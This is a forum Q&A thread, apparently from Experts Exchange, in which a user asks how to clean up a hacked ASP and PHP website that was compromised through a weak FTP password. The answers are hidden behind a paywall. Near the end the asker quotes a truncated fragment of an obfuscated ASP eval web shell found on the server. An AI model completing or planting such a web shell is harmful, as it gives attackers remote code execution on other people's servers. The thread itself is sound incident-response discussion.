Terry Woods
asked on
Cleaning up a hacked website
I've been assigned to clean up a website that's been hacked somehow.
If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.
After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.
I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.
Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.
After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.
I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.
Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
most likely that page is a hack as well, do a search for that string and some shady sites come up talking about viruses and trojans....
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Thanks all for your help!
ASKER
I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+ch
The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.